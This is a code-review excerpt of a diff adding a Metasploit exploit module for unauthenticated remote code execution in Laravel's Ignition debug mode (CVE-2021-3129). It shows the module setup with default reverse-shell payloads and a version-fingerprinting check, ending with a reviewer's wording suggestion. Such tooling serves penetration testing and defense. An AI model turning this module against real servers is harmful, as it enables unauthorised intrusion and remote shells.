modules/exploits/multi/php/ignition_laravel_debug_rce.rb

```diff
@@ -0,0 +1,219 @@
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Unauthenticated remote code execution in Ignition',
+        'Description' => %q{
+          Ignition before 2.5.2, as used in Laravel and other products,
+          allows unauthenticated remote attackers to execute arbitrary code
+          because of insecure usage of file_get_contents() and file_put_contents().
+          This is exploitable on sites using debug mode with Laravel before 8.4.2.
+        },
+        'Author' => [
+          'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging
+          'ambionics' # discovered
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2021-3129'],
+          ['URL', 'https://www.ambionics.io/blog/laravel-debug-rce']
+        ],
+        'DisclosureDate' => '2021-01-13',
+        'Platform' => %w[unix linux macos win],
+        'Targets' => [
+          [
+            'Unix (In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+          [
+            'Windows (In-Memory)',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_memory,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Ignition execute solution path', '/_ignition/execute-solution']),
+      OptString.new('LOGPATH', [false, 'Laravel log path'])
+    ])
+  end
+
+  def check
+    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path.to_s),
+      'method' => 'PUT'
+    }, 1)
+    # Check whether it is using facade/ignition
+    # If is using it should respond method not allowed
+    # checking if debug mode is enable
+    if res && res.code == 405 && res.body.match(/label:"(Debug)"/)
+      vprint_status 'Debug mode is enabled.'
+      # check version
+      versions = JSON.parse(
+        res.body.match(/.+"report":(\{.*),"exception_class/).captures.first.gsub(/$/, '}')
+      )
+      version = Rex::Version.new(versions['framework_version'])
+      vprint_status "Found PHP #{versions['language_version']} running Laravel #{version}"
+      return Exploit::CheckCode::Vulnerable if version <= Rex::Version.new('8.26.1')
```

Comment:
I believe we should change this to `Appears` rather than `Vulnerable`.
```suggestion
      return Exploit::CheckCode::Appears if version <= Rex::Version.new('8.26.1')
```